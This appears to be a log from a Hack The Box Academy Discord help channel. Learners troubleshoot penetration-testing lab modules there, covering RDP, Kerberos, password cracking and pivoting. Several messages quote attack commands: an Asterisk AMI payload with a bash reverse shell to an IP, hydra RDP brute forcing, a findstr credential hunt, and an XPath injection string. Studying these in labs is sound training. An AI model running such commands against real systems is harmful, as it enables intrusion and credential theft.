help me

can you please hurry up then?.. lol jk

i can try, which part exactly

can u dm me..i will send u pic there

ok

Im on last module called learning progress im stuck on last question where it compares 2 sets of numbers and asks what's the difference i need assistance anyone have a clue thank you

Guys, can someone help me ?

I really need a help

37.7-1.00

Hmmmm, i've already run mimikatz and dont return any functional for ms01

I run lsass attack and sam but nothing who will take me to admin on ms01

You can DM

Anyone manage to finish the Attacking Wordpress module?

Hy everyone. Can't solve the RDP question in academy https://academy.hackthebox.com/module/147/section/1327
Found login and pass but xfreerdp doesn't work. i tried this command with and without /cert:ignore /dynamic-resolution:
xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx'

I'm getting this:
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:53:784] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[12:50:54:401] [42421:42448] [ERROR][com.freerdp.core] - freerdp_post_connect failed

I also tried remmina, didn't work either

I have the exact same issue and haven't been able to figure it out either, I tried proxychains, sshuttle and chisel

Hello, is there someone who can help me with the module Password Attacks -> Pass the Certificate. I have a problem with the last part of first exercise - cannot connect to the victim through evil-winrm. I configured krb5, /etc/hosts, can ping dc01 but the command doesnt work:

└─$ evil-winrm -i dc01.inlanefreight.local -r INLANEFREIGHT.LOCAL

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL' Error: Exiting with code 1

I will appreciate somebody's time

this what i get with following command xfreerdp /v:10.129.202.136 /u:'xxxx' /p:'xxxxxxxx' +auth-only

[13:08:07:825] [69041:69042] [INFO][com.freerdp.client.x11] - Authentication only. Don't connect to X.
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[13:08:09:354] [69041:69042] [WARN][com.freerdp.crypto] - CN = WINSRV
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[13:08:09:655] [69041:69042] [ERROR][com.freerdp.core] - Authentication only, exit status 1

I'm trying to finish the medium lab for the footprinting module but I can't seem to get the flag correct.. I found the HTB password in the SQL Management Studio table and it still says it's incorrect

I used this for that part:

xfreerdp3 /u:xxxxx /p:'xxxxx' /v:10.129.135.38

Are you doing that for the RDP section or the medium lab?

hi guys! i am trying to find Mark's password in this section Password Attacks, Page 5, Writing Custom Wordlists and Rules, but i havent understood how i am supposed to rip his OSINT info for a wordlist.. can anyone help me out?

https://academy.hackthebox.com/module/147/section/1391

It is provided in the section, look where it says "Exercise"

Check the hint, it's a combination of using the tools and using your own reasoning

Who would I need to contact if I think I have the right password but it still says it incorrect

What is the 3rd most used word on the exercise target website?

Please help

I even looked up write ups, and they did the same thing... but the question says it's incorrect on HTB

Module Introduction to python3

That sounds like a wget, strings, and uniq sort kind of thing

I figured it out...

I really hate fonts that make l and I look the same...

What is the answer?

Apperantly MSSQL Server Management Studio makes them look like that for the password query

You should ask for a nudge in the right direction instead of just flat out asking for the answer.

You won't learn anything by doing that

I couldn't find it bro

right, so ask how to find it rather than what the answer is

Nb

Just did AEN semi-blind, only looked up few things for a sanity check

10/10 feel prepared for the exam

any suggestions

For the theme?

thats not an option

Nineteen worked for me, make sure it's disabled when editing

oh wait how do you disable them

W

W

👍

when i try to visit it says page not respnding

do i have to manually add this page ?

NVM i got it

you should probably take this to DM's are you're revealing a lot for a skill assessment

my bad, i got it

FYI
found on reddit: hydra -L username.list -P password.list rdp://10.129.202.136 -t 4
this got me creds without 'account on 10.129.136.137 might be valid but account not active for remote desktop' and they worked
apparently we were getting 'inactive' accounts or something like that. i don't understand why adding parallel tasks worked tho.

-t is threads, not tasks

lowering the threads means less bombardment of a service

it makes sense. thank you for explanation

Thank you again. This issue was a code pebcak. I was using the wrong addresses 🙂

@grand compass No. This is not a hacker for hire server and we don't condone illegal activities.

Okay just trying to find someone who’ll help

were you able to make it work?

I'm in a similar place. I found a authorization bearer token. I got AdminBot to give me a ready-to-use string version of it. But I've been getting invalid key with both and encoded versions of either. Even tried to package it in JSON. No luck. Have you found out more?

Have a question regarding the PenTest Getting Started Knowledge check. Comments and some walkthroughs mention looking at GTFOBins once the /usr/bin/php is found after checking sudo permissions. Q: When did they decide to look at GTFOBins?

I’ve only done the beginning but can’t spoil content on modules over tier 0, so dm

It's just a very common resource to look at if you think there is a utility that may allow you to privilege escalate. So as soon as you see that something like PHP can be ran as higher user or has S bit, you almost immediately check to see if a GTFObin command can be used.

@crimson leaf Thank you for the insight.

Also in addition, a common resource for Windows world to look at is lolbas

Is anyone available to have a look at my Burp Intruder payload attempt for "Skills Assessment - Using Web Proxies" question #3? I'm doing the two encoding methods in the correct order (at least I think I am). But the response I'm getting is a 404.

Has anyone completed the final assessment for LLM Output Attacks?I've been on it for 10 hours straight. I have 2 different authentication strings(assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Exhausted-And-Collapsed-on-the-Threshold. 😅

I'm super confused because when I refresh the page at admin.php, the page renders and I see a login screen. But when I look at the requests and responses in Burp, I see the response saying "The requested URL was not found on this server."
When I add some test credentials, I get 200 response codes but the fuzzing doesn't seem to be working for me.

Hi , what modules in HTB should I learn for binary exploitation ?!

There is a skill path, Intro to Binary Exploitation

thanks

hey in Tomcat - Discovery & Enumeration i keep getting a 404 when trying to go to /webapps/WEB-INF/web.xml

i added the vhost to /etc/hosts already

i can reach /docs no problem

404 means the page could not be found, not a dns error

am i missing a step?

right

but why cant i access that if i can access /docs

a 404 error from a webserver means the resource you are visiting is not there

but the question is asking for me to find the user admin's role and so i must access the web.xml

and based on the module the map of tomcat says the web.xml is always in the /webapps/WEB-INF directory

im not at all asking for the answer, just advice on where im going wrong/missing a step?

oh wait

lol im looking for the wrong file

my bad

wait but i still need the web.xml to know the servlet that is associated with admin

I feel like I'm close but all my response lengths are similar so I must be missing something. I used the hint, but no luck.

anyone who wants to team for the CPTS prep?

yes

but im not done with course, are you? i got 4 modules left

i'll DM u

@fathom pendant do you have a moment?

FOR?

sorry caps lock was on

It seems pretty straightforward but I'm not getting there.

Im trying to enumerate Tomcat and i cant seem to navigate to the web.xml

it helps to know the module name

but i'm also busy playing games

Tomcat - Discovery & Enumeration

in Attacking Common Applications

i don't recall having many issues getting the info it asked for

im able to access /docs

got the version number

Yo what's the meaning of Ports and what's an open port

@fathom pendant but im trying to get admin role which needs access to /WEB-INF correct? This is still enumeration not yet attacking yet.

have you tried using grok or chatgpt? They give a quick and detailed answer. You can also ask it to explain in simple terms, which is very useful.

👋Welcome

Anyone on that's finished "Skills Assessment - Using Web Proxies" question #3?

As a general note though @opal cape if you continue to ping me like that I will end up blocking you

my bad

I have a question regarding the timeline for modules. When it says it will take an average of 2 days to complete, what does that translate to in actual average hours spent on the module?

Asking for possible CEUs

1 day is measured as a working day

Got it so like 8 hours then per day?

Also i don't think HTB does CEUs, ik that they do CPEs

https://help.hackthebox.com/en/articles/6009966-cpe-allocation-htb-academy

I was just going to add it through CompTIA, they just want you to do seminars/trainings and add that you did it manually. I am tracking that ISC2 automated that process with HTB

There's no guarantee that comptia will accept it

so if we see a mod online, we shouldnt @ them? we just ask question and wait? is that correct?

Correct. Mods aren't staff. They're volunteers in the community.

ok ok

CompTIA is pretty odd with how they accept CEUs, I know I was able to add my Air Force training for all my required CEUs, and there's barely any proof you need to provide besides saying you did it in a document.

They do audits, but I've never heard of something being audited by them

I would say that these modules relate with PenTest+ so I don't get why they would have a problem with it

The only time it's ok to random ping mods is for server related issues i.e. someone spamming the channels. And even then, that's what the seriousrulebreak ping is for

Hi guys

I need some help if you don't mind

I'm stuck for real

where?

password attacks

You gotta give detailed questions

We can't read your mind on what you're stuck on

generatign custom wordlists

that section is a bit interesting, but you have all the keywords and info

And a link to how hashcat processes wordlists

still, I generated tens of wordlists and used differents rules but none of them worked

Use simple rules also make sure every entry starts with a capital letter

You can write your own custom rules list

The base wordlist is simple, just all the keywords from what you're given

using cupp?

or crunch?

Cupp isn't needed

Neither is crunch

You can just write a wordlist.txt file

Then your custom rules should be written to take into account potential common ways to end passwords

you just need custom.rules made with hashcat, no others tools

Like throwing a !, or a <year> or a <year>! At the end

The link to the hashcat page on how to write rules is really helpful to get it working properly

If you wanna get fancy, figure out a way to filter out all the passwords that aren't at least 12 characters long

Thanks

u need to use autorun

also try to stay away from proxychains

it sucks so much

i dont know which question ur on, but proxychains works at the start.

just dm me, ill show u

Can you look at my erratum ;), i just hope it doesnt get missed
"Incorrect answer on HTB module"

I'm not staff

ohh how come you looked at my old one

Also in future still redact answer fields

I don't know what answer you're expecting tbh. But as far as the erratum stuff goes; if it's not a general Skill Issue ™️ then I don't really bother with responding

Hello everyone does anyone here know which Setting I need to enable in ZAP to edit like in the image provided?

Has anyone completed the final assessment for LLM Output Attacks?I've been on it since 5am and it's now 5pm and I still... can't... let... go... 😜 I have 2 different authentication strings(assuming one of them isn't a LLM hallucination), but haven't been able to do anything with either of them (even with encodings). I could really use some advice! With fond regards, Stranded PromptPhantom. 😅

Hey anyone knows how to get a revershell from Asterisk AMI. I tried creating extension and executing it. Didn’t work

‘’’Action: UpdateConfig
SrcFilename: extensions.conf
DstFilename: extensions.conf

Action-000000: NewCat
Cat-000000: hackbox2

Action-000001: Append
Cat-000001: hackbox2
Var-000001: exten
Value-000001: 1009,1,System(bash -i >& /dev/tcp/192.168.100.93/443 0>&1)’’’

best to say the module and section. if it's box related then #boxes.

it was related to Wanderer Pro lab, nvm got it

#1263635449335910531 would be the place then

i got no access

You'll need to follow the instructions in #welcome to gain access to most channels, including #1263635449335910531.

hey, im getting this error "Cannot find path 'C:\Tools-' because it does not exist..Exception" when running Invoke-DomainPasswordSpray on module Active Directory Enumeration & Attacks section Internal Password Spraying - from Windows. Any solution?

that's a very straightforward answer. it says it can't find that directory. did you accidentally add a - after tools or are you trying to run from c:\tools-?

im running it from c:\Tools\

is this expecting a userlist? cause i have one with 2900 usernames and nothing happened

Make sure you import the PowerShell module and run it from the correct directory.

already did... now is giving me a lot of false positive

well.. that section isnt working well ... i already made as solution said and gave 3 user false positive, and using a list with the correct username didnt show it as success

Your error directly says C:\Tools- doesn't exist. Also the challenges don't normally follow what they teach exactly. You have to apply what you learned and sometimes go back and re-read it.

The module itself is a guide

Yo i wanna start ethical hacking and i know nothing. Plz help

i dont know why is saying C:\Tools- doesn't exist. im not putting it in my Invoke-DomainPasswordSpray command.

Sorry, what do you mean by is a guide? I am trying to follow the guide as well and I've tried exactly what it tells me to do but I still cannot RDP

Start with Academy, theres a path called Cyber Security Foundations

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

And that ^

Hey learner's, I am stuck on Attacking common services - medium

Didn't get any entry point please give me some hint

I am trying it since yesterday

Hey guys. I need some help. I'm working on network services in the Password Attack Module. It's taking forever on my machine via the vpn to crack the username and password especially using the netexec command. How do I get to use the networkresources.zip files in the pawnbox? It's suggested that using them in pawnbox will take lesser time.

Hello, my name is Yasmin, I currently use Parrot OS Home🦜 Linux I would like you to recommend some courses or tutorials on YouTube, thank you.

Hi, welcome. This channel is dedicated for discussion of the various modules on HTB's Academy platform. Please read the #rules and follow the instructions in #welcome so you can gain access to more channels where it's more appropriate to ask about your question.

HELLO is there anyone from help center? I still haven't got an email and reply from help center yet . I mistakenly subscribed silver plan .Can anyone help me?

There is no support over discord. You will have to wait for an official support team reply via email.

Will they refund me?

It has been 2 days already

As 0daybug said, support is not provided over discord. No one here can help you. It's the weekend, there is only limited support. Be patient and they'll get back to you.

Oh I see. Thanks for answering.

For this section: https://academy.hackthebox.com/module/57/section/498, I ran the script for all 10,000 pins with no results. I also tried the supposedly correct pin manually in the url, and I still got the "Incorrect Pin!" result. A reset did not help; has anyone else experienced this?

It’s also been the weekend.
w

Doing Pivoting,Tunnelling & Port forwarding section with Chisel as sub topic. Able to connect to pivot host as well as attack Host but when I try to run xfreeRDP using proxychains I get socket error or timeoutr message. Please help

I have tried several times and still it does not get connected but keeps on giving socket error

Add /timeout:10000 to the end of the rdp command.

Hey brothers don't ignore me, please give some hint

Good morning everyone, i have a question about the module "password Attacks" -> Writing Custom Wordlists and Rules

i've tried ALOT already but my hashcat seems getting exhausted with my custom wordlists i made & rule set

i mean did you scan everything did you enumerate the ports you found?

Sorry sir I DONE that now I stuck in HARD challenge I completed MEDIUM !

don't call me sir

the same question appplies to hard if you're stuck at a foothold

That might break the TOS.

you don't need to use another user's rule llist

it's a complete hashcat list

mine didn't do the trick, but oh well found it

you can write a very simple one that'd do the trick

you likely just didn't add something very simple to the list :P but it can be done with like a handful of rules

yea, i see the password & can deffo tell i missed something

since you already got it you can dm me with your custom.rule and i can see if i can tell you where you went wrong

One of my colleagues just popped me that github link & ngl it's very nice to have these rule sets

it's good to know how to write them just in case

@zealous portal this isn't that kind of server.

Hey, no worries — I understand this might not be the right place.

But just wondering... do you happen to know any Discord servers that support people learning cybersecurity, maybe even help with learning tools or resources?

Thanks a lot, I really appreciate any direction 🙏

this server has plenty of resources, and definitely supports people in learning. But not in the way that you are looking for. I suggest reading #welcome to learn what this server is about, there's plenty of free stuff out there on HackTheBox so you don't have to pay anything. And there's a #resources-tools channel where people share various different links to (generally) free tools and such to help others

Thanks a lot for the info!
I totally understand now. I’ll check those channels and explore the free tools you mentioned.
Really appreciate your help 🙏

in the short term though: looking for handouts will generally get you pushed away from many communities as they'll see it as you just trying to gain stuff without doing anything

Hi, Anyone available for a sanity check for the module Windows Lateral Movement -> WinRM? I managed to get the last question, but I would Ike to verify if I did in the intended way. Thanks

I would really appreciate a nudge for Client-Side Prototype Pollution. Are we not supposed to be able to read this script? ||prototypes.htb/devscript.js||

• 20 What's the password of the account you found?
  Have any of you finished Using CME module? Its on CAPE path, but I am doing it as extra for CPTS.

I am stuck on the first question. looks like SMB null auth is disabled. tried --users --rid-brute. both didnt work. can anyone help?

you don't really need to do anything outside the CPTS path for CPTS

it also helps if you say what section you're on

sorry. Skills assessment. First Question.

Hint Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?
But null sessions are failing every time

it looks like you're meant to be utilizing chisel or a proxy setup

yeah the instructions start you off with telling you you need to connect to the internal proxy network using chisel

I see. okay. I will give that a try. Thanks

steps to connect to the target environment

what are you doing dude

@fathom pendant you still active so you can deal with this?

I'm sorry if this question was asked before, but did any of the password attack module sections got changed, that aren't entirely new? By that I mean, did the content of some of them changed but still get shown as completed for people that already completed the module before? Or just hte new sections and that's it?

There's likely some changes in the existing sections

this is why you don't do drugs kids

and this is why the ping is disabled so idiots look like dumbasses when they try

several sections got changed around and more user friendly; alongside entirely different questions for some sections that are still marked "completed"

i believe the module should have a changelog

ah nvm the changelog only states "module v2 released"

you probably mean this right:

yeah

useful changelog, very nice xD

Thank you tho

i haven't fully dissected the module to update my notes i kinda only skimmed through for completion

password attack module is killing me PKINIT having oscrypto issues in pwnbox should it work on fresh pwnbox if i just git clone and run it or am i meant to be resolving oscrypto issues?

@spring island

despite connecting its failing

<--socket error or timeout!

running nxc with proxychains on the IP spawned right?

proxychains yeah, but you'll have to figure out the internal stuff

also make sure you have the proxychains config set properly

I got the proxychains4.conf edited with the correct port. I am supposed to try SMB null auth on the target spawned and connected to with chisel right?

first step is finding out the devices on the network :)

remember you're tasked with attacking the internal 172.16.15.0/24 network, so it won't be against the spawned target

1. I tried to run a ping scan with proxychains but that didnt work
2. I tried to use --gen-relay-list , but even that didnt work. This is for mapping the IPs which are on the internal network

any hint? I first need some valid IP to do SMB Null auth against right?

well proxychains generally dislikes icmp; but you can do a range with nxc

just specify the network/cidr instead of just ip

and run smb null auth on the cidr?

yep

Try pip3 install -I git+https://github.com/wbond/oscrypto.git, I will work on getting that information in the module itself

Refuses to work

└─$ proxychains nmap -p445 --open -n -T4 172.16.15.0/24
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 14:28 IST
Nmap done: 256 IP addresses (256 hosts up) scanned in 28.10 seconds

even tried nmap to find any valid ip. Proxychains + nxc doesnt even work.

the --force-reinstall seemed to have fixed it on pwnbox thank you can get passed that step now 🙏

throw -Pn on the nmap request

To add on to this: proxychains doesnt support ICMP and nmap tries to ping (ICMP requests) the target, -Pn just makes it assume that the target is up without pinging it

Hey i am in the setting up module in the Linux section and I am new to this field i have set up the ParrotOS VM but its giving me commands that i dont understand like to update things and install things is that ok or i am supposed to already undertstnad?

you don't have to follow along directly, the example command even includes ...SNIP... meaning that it's cut off

but i dont understand like the commands itself

the main thing you need to know is that sudo apt install <some package here> is used to install packages, if you have a large list of tools
sudo apt install $(cat tools.list | tr "\n" " ") -y
$() is a bash construct that says "run whatever is in here before processing the rest of the first command"

so the $(cat tools.list | tr "\n" " ") part is saying read the file (tools .list) and translate (tr) every new-line (\n) to spaces " " so that a list like

one
two
three
four

turns into

one two three four

so it can be properly read by apt
the -y is just "assume yes whenever it asks questions"

ohhh

you can throw the command at chatGPT and just say "explain <command>" and it explains it fairly decently

here is the GPT explanation (Which i guess is close to mine):
The command you're asking about is a combination of shell utilities used in a Unix-like operating system (such as Linux) to install packages listed in a file. Let's break it down:

Command:

sudo apt install $(cat tools.list | tr "\n" " ") -y

Breakdown:

1. sudo:
   • This is used to run commands with superuser (root) privileges. You typically need sudo to install software or make system-wide changes.
2. apt install:
   • This part tells the system to install software packages. apt is a package manager for Debian-based distributions (like Ubuntu)
3. $(...) (Command Substitution):
   • This syntax is used to run a command and substitute its output into the main command. In this case, whatever the cat tools.list | tr "\n" " " command outputs will be inserted here
4. cat tools.list:
   • cat is used to display the contents of the file tools.list. This file presumably contains a list of package names, one per line.
5. tr "\n" " ":
   • The tr command is used to translate or delete characters. In this case, tr is replacing all newline characters (\n) with spaces (" "). This converts the list of package names (one per line) into a single line of space-separated package names.
6. -y:
   • The -y flag automatically answers "yes" to all prompts during the installation process. This is useful when you don't want to manually confirm the installation of each package.
     Example:
     Let’s say tools.list contains the following:

curl
git
vim
htop

The command would first execute cat tools.list, which outputs:

curl
git
vim
htop

Then, tr "\n" " " will transform this into:

curl git vim htop

Finally, the entire command becomes:

sudo apt install curl git vim htop -y

This installs curl, git, vim, and htop all at once, and the -y flag ensures that you won't be prompted for confirmation during the installation.
In Summary:
This command is a convenient way to install multiple packages listed in a file (tools.list) with one command, automatically confirming all prompts.

but the thing is I dont understand the commands themselves and how to use them so will this module be able to teach me it?

you generally don't need to run apt install in the linux fundamentals module

you will run into cases in higher tier modules where you may need to install a tool but the syntax is generally always given to copy/paste

the module itself encourages external research of some of the commands it presents in order to get a better grasp of how to do things

alr then thx

holy moly "pass the certificate" was rough thanks for the fix finished it now but many hours wasted before coming to discord, lesson learnt for next time

Yeah, one obvious thing that is not included in the module is how to enumerate/detect ESC8 vulnerability.

someone?

Did you guys solve artificial machine

On the season 8

what's the section name?

Can anyone help me out

read and follow #welcome to access #1386042800323301447

this channel is for help with academy modules, not with the machines on the main platform

remove the -n

also the module is above tier 0; so avoid posting spoilers like that

thanks

ok

Does it mean by trial machine like its either i get a product activation key or i need to make a new windows vm every 90 days?

not necesssarily need to make a new one, snapshots are what's important here

alr thx

just finished installing shall i run it in my host machine or inside a vm ?

in a vm

it's meant to be a vm

Hey Marcie, I'm still stuck on that PW Attacks module... I can't find anything tied to LINUX01$ --> Genuinely getting frustrated, do you think you could give me another nudge? I can't find anything with realm etc, but I'm also feeling borderline stupid

/etc/ is an important place.

Yeah, I know that there's a keytab file there, but no matter what I had tried, I couldn't crack that... Is it not that file?

Hello guys, I am having some issues with HTTP Response Splitting exercise in the academy. I have a working XSS through target request, but I dont understand how to trigger xss on the admin. Can someone DM me?

Hi Guys,
Just started the CPTS journey.
I am doing Getting Started module. After spawning the target machine, i am running some scans and enumeration. But the http request times out very often. It works for some time and then it again times out. Any suggestion to make this journey smooth??

there's other ways to interact; like with ccache files

try changing the vpn regions

Thanks mate will try thisp

That module made me feel brain dead, I appreciate your help though, thanks! Got it

So I am in the middile of HTB Linux Fundementals and I am trying to touch and mkdir. I am using Kali in a vbox, info so you can kind of guess where I am at. SO when I try touch and mkdir it says I don't have permissions. I am in the nixfund from the previous modules. Do I just have to be out of nix or should it work there too? If I confused you, you ain't the only one.

I'm having constant connection issues with https://academy.hackthebox.com/module/163/section/1554 . I've been doing exactly the same thing and it has only worked a few times out of many attempts. Any ideas please?

lol i'm in now! 20 attemtps later... but if someone can explain the issue, i'd be very much appreciative

I need some help with Pass The Certificate.
https://academy.hackthebox.com/module/147/section/1335

I have managed to get jpinkman ccache, however unable to proceed further.

evil-winrm hits an error:

$ evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot find KDC for realm "INLANEFREIGHT.LOCAL"
Error: Exiting with code 1

I have my etc hosts file set with the domain and DC IP:

$ cat /etc/hosts
10.129.234.174 dc01.inlanefreight.local inlanefreight.local dc01
10.129.234.172 ca01.inlanefreight.local ca01

etc krb5 config file:

$ cat /etc/krb5.conf
[libdefaults]
default_realm = inlanefreight.local
.................
[realms]
inlanefreight.local = {
kdc = dc01.inlanefreight.local
admin_server = dc01.inlanefreight.local
}
................

appreciate any help with this..

just completed the Password Attacks final. if anyone else completed i would love to know others attack path on this one. i did a few things not covered in this section and not sure if it was possible without a fair amount of tunnels.

also of course would prefer a DM to avoid spoilers 🙂

Have you set up the KRB5CCNAME variable correctly?

yes

$ klist
Ticket cache: FILE:/home/kali/htb/jpinkman.ccache
Default principal: jpinkman@INLANEFREIGHT.LOCAL

Valid starting Expires Service principal
06/23/2025 08:20:33 06/23/2025 18:20:33 krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL

Try edit this line default_realm = inlanefreight.local to default_realm = INLANEFREIGHT.LOCAL

I uploaded a web shell successfully, and I received the response:
File successfully uploaded.

But when I try to access it via the path, I can't find the file or it doesn't execute.

This is part of the "File Upload Attacks – Blacklist Filters" section.

YES U ARE RIGHT!!!! THANKS SO MUCH!!!!

File will be uploaded to /profile_pictures/[name of file]

i know but i cant find it

You are the one who sets the file name, so if the file name is test.php, it will be uploaded to /profile_pictures/test.php , if not, upload it again.

Not sure about this issue, but if you have time, I'd recommend looking into ligolo-ng for pivoting. I found it a lot easier to use

hi guys, i'm stuck at new update Password Attacks- Credential Hunting in Network Shares, it hard to find domain admin pass :v i found some fake pass,... in share like .pdf, txt, csv, docx ps1.... anyhint? thanks

I used the netexec stuff covered in the section and tried keywords from the question, but I'm sure you could use other techniques from the section too.

i tried nxc but this with jbader seem faster?
findstr /SIM /C:"pass" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.docx *.pdf *.pptx *.csv *.xlsx

i found lots of fake pass

Then figure out a way to reduce the noise.

Hello the community, I am stuck at the "XPath - Blind Exploitation" And extracted the XML structure as

    <acc>
        <username></username>
        <password></password>
    </acc>
</accounts>

But when I try to extract the content of the password I got nothing adm'+or+substring(name(/accounts/acc/password/text()),1,1)=1+and+'1'='1

sure but is someone deleted my file?

If someone have a hint

thanks

No one else should have access to your target host.

Okay noted, I will do. thanks man!

can you give me hint where folder is it? i'm sleepee

How to access to general

Your target IP. If you're tired, I highly suggest getting some rest. This lab will still be here tomorrow.

Navigate to #welcome read over the #rules and you should be good to go.

O... K

Good morning all, is anyone available to help with :
"Skills Assessment - Using Web Proxies" question #3: Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I think I have Intruder and my encoding set up correctly. Happy to share screenshots privately to avoid spoilers. Nothing stands out in my response lengths so I don't think I have it figured out yet. Been stuck on this one for a couple days.

Thanks to an amazing community contributor, we got there! Thank you!

did you get 31 chars

I don't mind looking it over. Feel free to DM.

When you’re Kali vm crashes and you scramble to get the cherry tree file with all your notes….

Yes. I'm sending the 31 characters plus my payload using the given wordlist in my request.

do you know if someone have a hint because i iterate or the caracter used to iterate for the password but no result if someone can help me please I am stuck from 3hours thanks

Has anyone completed the final assessment for LLM Output Attacks? I have 2 different authentication strings (assuming one of them isn't a LLM hallucination), but haven't been able to do anything with them yet (even with encodings). I could really use some advice! With fond regards, Stranded AI-Ninja-wannabe.

does anybody comleted Password Attack: Pass the Certificate Needed some Help!!!

anyone got a nudge for Attacking Common Services - Hard?
i ve got the final flag but it doesnt accept. Wondering if i did it wrong or something

You can DM what you have.

I recommend using the search function as this question has been asked plenty of times. You might find something in the search results that helps you.

I have a question from the seniors here ! i'm having trouble grasping the full concept of windows registry, like what sort of information does registry store?

im doing the passwords attacks' skill assessment can someone guide me on where to start or just a small hint would be helpful

The provided scenario tells you where to start. Think about the information you have and what section covered what to try with that type of information.

should i start by enumerating the given target the one that get spawned or the other 4

Since you will only be able to hit the target IP 10.129.xxx.xxx, I'd start there.

thank you

Hey guys can I ask a question here?

about a task in linux fundamentals

Hi guys, would very much appreciate any help on the module "Password Attacks - Writing Custom Wordlists and Rules".

Does my password list all have to be at least 12 characters long? Im not sure how to proceed any help would be nice 😄

What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).

does any one know the answer to this ?

Hey I can't seem to message in the general channel. Why is that?

You need to verify your account, instructions are in #welcome, read #rules while you're at it.

can i dm u if its ok with u

lol @gray yacht , i probably because i worked for a long time maybe i was dizzy so i missed the file my query easily caught it from the first moment i ignored it. after a little rest maybe i was fine and saw it

Why do you need to DM me?

i managed to ssh into the user , got the bash history found another uer's creds but when i try to ssh to it it doesn't even resolve even when they are within the same ip subnet

You are going to need to setup something to reach internal IPs. If you've already done the pivoting module, this should be easy. If not, some Google searches should help you figure out some methods to try.

I'm feeling stuck starting medium footprinting, I've attempted to mount to the folder but was denied so i tried spoofing UID which didn't work because they were hidden. rpcclient doesnt allow unknown login so I'm not sure where to go

I guess I'm good to ask a question, so in linux fundamentals there is a task "Submit the full path of the "xxd" binary. " . I already solved it by which, but when I try to solve it by using locate, I see other PATHs too, and the question arises, what do other xxds do and why hack the box only requires "/usr/bin/xxd" this path and not for example this path "/snap/core/10126/usr/bin/xxd"

have you checked nfs?

i got same problem too, you can try to access with root on VM

switching to root prior to mounting ?

just simple sudo -i then you go there by cd

ahhh thank you

Hey everyone, I am currently stuck on question 6 from the Pass The Hash module in the CPTS course. I am unable to catch the reverse shell from the DC. I have tried everything. Would anyone be able to help?

have you changed payload?

try another port and dont forget listening nc.exe

yeah im using a base64 powershell encoded payload over port 8001. listening via nc on the rdpclient MS01

touch and mkdir only work if you have write permissions to that directory

use CMD to run the payload, not PowerShell

it's expecting you to use the answer that would come from using which which resolves the first /path/to/binary that resolves

may i ask why?

well for one, that's what the example shows, no?

but for another it's likely how the payload gets processed in cmd vs powershell

the listener uses CMD however, the payload uses powershell

wrong; the payload invokes powershell

isnt that essentially what i just said..

nope

invoking powershell isn't the same as using powershell

i.e. in zsh you can invoke a bash command with bash -c "insert commands here"

ok well my apologies for not using the correct verbiage

Is there a way to know which sections have been updated in a module that has been updated? It's been a while since I've done password attacks

perhaps I should just go over everything again

you'd have to go through everything

and have they fixed yet the bug where old answers get saved when the questions change?

did you find the correct input? i am at exactly the same situation.

nope

also it's not a bug per-se it's just how things on the backend work

many such /feedback have been submitted

I mean it shouldn't be the desired behaviour there are better ways to adress that

i would hope they did it's been about a year since they posted that

again /feedback

i can't rdp to lab machine in Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows From active directory module in cpts path.

@fathom pendant Sorry to tag you ! I wanted to know wether there are machines for students who have completed the "Introduction to windows cli" module?

https://academy.hackthebox.com/academy-relations

thank you ! Although i see that most of the machines are connected to the multiple modules does it mean i will have to complete those modules as well?

generally speaking yes; the fundamental modules really don't prep you to be ready for many of the machines as a lot of the retired machines require some form of attack vector to even land on the machine in the first place

got it ! Study more xD thanks

Sorry boss ! 🤝

